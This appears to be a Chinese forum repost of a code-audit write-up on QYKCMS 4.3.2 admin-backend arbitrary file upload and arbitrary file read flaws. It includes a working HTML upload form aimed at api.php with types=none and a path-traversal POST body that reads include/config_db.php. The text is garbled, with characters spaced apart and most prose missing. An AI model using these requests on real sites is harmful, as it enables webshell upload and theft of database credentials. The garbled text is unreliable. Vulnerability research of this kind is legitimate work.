搜索

[851] 2018-03-30_【代码审计】QYKCMS后台任意文件上传、任意文件读取漏洞

文档创建者:s7ckTeam
浏览次数:69
最后更新:2025-01-16
2018-03-30_【代码审计】QYKCMS后台任意文件上传、任意文件读取漏洞 0 0 0 1 0 2 Q Y K C M S   B y p a s s   B y p a s s   2 0 1 8 - 0 3 - 3 0 Q Y K C M S P H P + M y S q l T 0 0 l s Q Y K C M S Q Y K C M S h t t p : / / w w w . q y k c m s . c o m / Q Y K C M S _ v 4 . 3 . 2 h t t p : / / b b s . q i n g y u n k e . c o m / t h r e a d - 1 3 . h t m 1 / a d m i n _ s y s t e m / i n c l u d e / l i b / u p f i l e . p h p       2 4 - 6 9 t y p e s $ t y p e s = n o n e
0 3 1 F o r m k e y X S S C O O K I E 1 .     < f o r m   e n c t y p e = " m u l t i p a r t / f o r m - d a t a "   a c t i o n = " h t t p : / / 1 2 7 . 0 . 0 . 1 / a d m i n _ s y s t e m / a p i . p h p ? a d m i n = a d m i n & k e y = 1 5 b c 3 0 c b 5 b f c 1 7 7 5 c 4 7 3 3 c 9 5 5 8 f d e d 9 1 & l o g = u p f i l e & t y p e s = n o n e "   m e t h o d = " p o s t " >     2 .     U p l o a d   a   n e w   f i l e : < b r >     3 .     < i n p u t   t y p e = " f i l e "   n a m e = " f i l e "   s i z e = " 5 0 " > < b r >     4 .     < i n p u t   t y p e = " s u b m i t "   v a l u e = " U p l o a d " >     5 .     < / f o r m >       2 3 | 访
0 4 1 / a d m i n _ s y s t e m / i n c l u d e / s h o w / t e m p l a t e . p h p     1 - 2 2 p a t h f i l e _ g e t _ c o n t e n t s p a t h Q Y K C M S i n c l u d e c o n f i g _ d b . p h p , h t t p : / / 1 2 7 . 0 . 0 . 1 / a d m i n _ s y s t e m / a p i . p h p     P O S T :   a d m i n = a d m i n & k e y = 6 8 2 b 8 2 f 8 d c 3 b 7 5 3 d 6 e b 9 c e a f d 5 a 6 4 3 0 1 & l o g = s h o w & d e s c = t e m p l a t e & p a t h = . . / i n c l u d e / c o n f i g _ d b . p h p     E N D         C M S j u s t   f o r   f u n B y p a s s
A b o u t   M e W A F
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理